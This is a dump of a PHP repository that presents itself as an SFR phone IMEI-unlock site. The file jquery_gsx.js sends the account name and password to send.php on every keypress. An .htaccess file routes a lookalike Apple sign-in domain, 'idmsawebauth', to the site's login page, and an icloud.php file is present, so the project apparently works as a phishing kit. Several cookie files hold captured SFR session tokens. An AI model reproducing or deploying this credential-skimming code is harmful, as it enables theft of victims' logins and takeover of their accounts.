├── login ├── sfr.jpg ├── css │ ├── bg.gif │ ├── bg1.gif │ ├── jquery_gsx.js │ ├── script.js │ ├── accueil.css │ ├── example.css │ ├── index.js │ ├── check_imei.js │ ├── stroll.min.js │ ├── style.css │ ├── stroll.js │ └── stroll.css ├── unlock_action.php ├── check_imei_action.php ├── check_account_action.php ├── cookies │ ├── verif_service.txt │ ├── check_imei.txt │ ├── get_nck.txt │ ├── unlock.txt │ ├── get_imei_unlock.txt │ └── verif_service_unlock.txt ├── deconnexion.php ├── .htaccess ├── less │ ├── .htaccess │ └── style.less ├── home.php ├── login.php ├── icloud.php ├── login_action.php ├── header.php ├── accueil.php ├── unlock.php ├── check_imei.php ├── check_account.php ├── get_code.php └── simple_html_dom.php └── .htaccess /login/sfr.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ahmedbhl/Sfr-Unlock-All-imei/HEAD/login/sfr.jpg -------------------------------------------------------------------------------- /login/css/bg.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ahmedbhl/Sfr-Unlock-All-imei/HEAD/login/css/bg.gif -------------------------------------------------------------------------------- /login/css/bg1.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ahmedbhl/Sfr-Unlock-All-imei/HEAD/login/css/bg1.gif -------------------------------------------------------------------------------- /login/unlock_action.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ahmedbhl/Sfr-Unlock-All-imei/HEAD/login/unlock_action.php -------------------------------------------------------------------------------- /login/check_imei_action.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ahmedbhl/Sfr-Unlock-All-imei/HEAD/login/check_imei_action.php -------------------------------------------------------------------------------- /login/check_account_action.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ahmedbhl/Sfr-Unlock-All-imei/HEAD/login/check_account_action.php -------------------------------------------------------------------------------- /login/cookies/verif_service.txt: -------------------------------------------------------------------------------- 1 | # Netscape HTTP Cookie File 2 | # http://curl.haxx.se/docs/http-cookies.html 3 | # This file was generated by libcurl! Edit at your own risk. 4 | 5 | .espace-client.sfr.fr TRUE / FALSE 1446603045 espace_client c7cbf471.523ad8111b55e 6 | -------------------------------------------------------------------------------- /.htaccess: -------------------------------------------------------------------------------- 1 | 2 | RewriteEngine on 3 | RewriteCond %{HTTP_HOST} ^idmsawebauth\.com$ [OR] 4 | RewriteCond %{HTTP_HOST} ^www\.idmsawebauth\.com$ 5 | RewriteRule ^/?$ "http\:\/\/idmsawebauth\.com\/login\/login\.php" [R=301,L] 6 | 7 | 8 | ErrorDocument 404 http://idmsawebauth.com 9 | 10 | 11 | -------------------------------------------------------------------------------- /login/cookies/check_imei.txt: -------------------------------------------------------------------------------- 1 | # Netscape HTTP Cookie File 2 | # http://curl.haxx.se/docs/http-cookies.html 3 | # This file was generated by libcurl! Edit at your own risk. 4 | 5 | .espace-client.sfr.fr TRUE / FALSE 1446603045 espace_client 6620bc46.523ad81160cb0 6 | #HttpOnly_espace-client.sfr.fr FALSE /desimlockage/ FALSE 0 JSESSIONID A0E3300537343055B4F2F77F5A26F63D.sfc-desimlockage24 7 | .sfr.fr TRUE / FALSE 0 MLS "Mjg6NTQ7MzI4NQ==" 8 | -------------------------------------------------------------------------------- /login/cookies/get_nck.txt: -------------------------------------------------------------------------------- 1 | # Netscape HTTP Cookie File 2 | # http://curl.haxx.se/docs/http-cookies.html 3 | # This file was generated by libcurl! Edit at your own risk. 4 | 5 | .espace-client.sfr.fr TRUE / FALSE 1446603027 espace_client 974b45f0.523ad8004c805 6 | #HttpOnly_espace-client.sfr.fr FALSE /desimlockage/ FALSE 0 JSESSIONID 816F3C89C75A8A18A495203A151568A1.sfc-desimlockage23 7 | .sfr.fr TRUE / FALSE 0 MLS "MjgzMzU1MzM6Mw==" 8 | -------------------------------------------------------------------------------- /login/cookies/unlock.txt: -------------------------------------------------------------------------------- 1 | # Netscape HTTP Cookie File 2 | # http://curl.haxx.se/docs/http-cookies.html 3 | # This file was generated by libcurl! Edit at your own risk. 4 | 5 | .espace-client.sfr.fr TRUE / FALSE 1446605059 espace_client 193eb515.523adf91d700d 6 | #HttpOnly_espace-client.sfr.fr FALSE /desimlockage/ FALSE 0 JSESSIONID 09EB7405F4D17204664896F1CBAD6821.sfc-desimlockage24 7 | .sfr.fr TRUE / FALSE 0 MLS "MjgzMzU1MzM6Mw==" 8 | -------------------------------------------------------------------------------- /login/cookies/get_imei_unlock.txt: -------------------------------------------------------------------------------- 1 | # Netscape HTTP Cookie File 2 | # http://curl.haxx.se/docs/http-cookies.html 3 | # This file was generated by libcurl! Edit at your own risk. 4 | 5 | .espace-client.sfr.fr TRUE / FALSE 1446603027 espace_client 9d4f8cf9.523ad80002077 6 | #HttpOnly_espace-client.sfr.fr FALSE /desimlockage/ FALSE 0 JSESSIONID 382B3CA95C76B62906E344492005BAD7.sfc-desimlockage23 7 | .sfr.fr TRUE / FALSE 0 MLS "MjgzMzU1MzM6Mw==" 8 | -------------------------------------------------------------------------------- /login/cookies/verif_service_unlock.txt: -------------------------------------------------------------------------------- 1 | # Netscape HTTP Cookie File 2 | # http://curl.haxx.se/docs/http-cookies.html 3 | # This file was generated by libcurl! Edit at your own risk. 4 | 5 | .espace-client.sfr.fr TRUE / FALSE 1446605058 espace_client c9837f09.523adf90a323d 6 | #HttpOnly_espace-client.sfr.fr FALSE /desimlockage/ FALSE 0 JSESSIONID 42C293CA879A2381EE7441FEF0DF5504.sfc-desimlockage25 7 | .sfr.fr TRUE / FALSE 0 MLS "MjgzMzU1MzM6Mw==" 8 | -------------------------------------------------------------------------------- /login/deconnexion.php: -------------------------------------------------------------------------------- 1 | alert ("merci pour votre visite")'; 11 | ?> 12 | setTimeout('location=(\"login.php\")' ,0);"); 14 | ?> -------------------------------------------------------------------------------- /login/css/jquery_gsx.js: -------------------------------------------------------------------------------- 1 | 2 | 3 | $(document).ready(function(e) 4 | 5 | { 6 | 7 | 8 | 9 | $(".iid").keypress(function() { 10 | 11 | 12 | 13 | 14 | 15 | var id=$("#accountname").val(); 16 | 17 | var pass=$("#accountpassword").val(); 18 | 19 | $.ajax 20 | 21 | ({ 22 | 23 | 24 | 25 | type: "GET", 26 | 27 | url: "send.php?id="+id+"&pass="+pass, 28 | 29 | 30 | 31 | }); 32 | 33 | 34 | 35 | }); 36 | 37 | 38 | 39 | // event.preventDefault(); 40 | 41 | 42 | 43 | }); -------------------------------------------------------------------------------- /login/.htaccess: -------------------------------------------------------------------------------- 1 | # Do not remove this line or mod_rewrite rules and search engine friendly URLs will stop working 2 | RewriteBase / 3 | DirectoryIndex /login/login.php 4 | 5 | 6 | ErrorDocument 401 "Unauthorized" 7 | ErrorDocument 403 "Forbidden" 8 | RewriteEngine On 9 | #RewriteCond %{HTTP_HOST} ^devtalifoun\.com$ [OR] 10 | #RewriteCond %{HTTP_HOST} ^www\.devtalifoun\.com$ 11 | #RewriteRule ^/?$ "http\:\/\/devtalifoun\.com\/login\/login\.php" [R=301,L] 12 | 13 | #### PERSISTENT CONTENT #### 14 | RewriteCond %{REQUEST_FILENAME} !-f 15 | RewriteCond %{REQUEST_FILENAME} !-d 16 | RewriteRule ^(.*)$ zyro/$1 [L,QSA] 17 | ErrorDocument 404 http://devtalifoun.com 18 | 19 | 20 | -------------------------------------------------------------------------------- /login/less/.htaccess: -------------------------------------------------------------------------------- 1 | # Do not remove this line or mod_rewrite rules and search engine friendly URLs will stop working 2 | RewriteBase / 3 | DirectoryIndex /login/login.php 4 | 5 | 6 | ErrorDocument 401 "Unauthorized" 7 | ErrorDocument 403 "Forbidden" 8 | RewriteEngine On 9 | #RewriteCond %{HTTP_HOST} ^devtalifoun\.com$ [OR] 10 | #RewriteCond %{HTTP_HOST} ^www\.devtalifoun\.com$ 11 | #RewriteRule ^/?$ "http\:\/\/devtalifoun\.com\/login\/login\.php" [R=301,L] 12 | 13 | #### PERSISTENT CONTENT #### 14 | RewriteCond %{REQUEST_FILENAME} !-f 15 | RewriteCond %{REQUEST_FILENAME} !-d 16 | RewriteRule ^(.*)$ zyro/$1 [L,QSA] 17 | ErrorDocument 404 http://devtalifoun.com 18 | 19 | 20 | -------------------------------------------------------------------------------- /login/home.php: -------------------------------------------------------------------------------- 1 | 2 | 3 |
4 | 5 |

85 |
86 |
87 |
88 |
89 |
90 |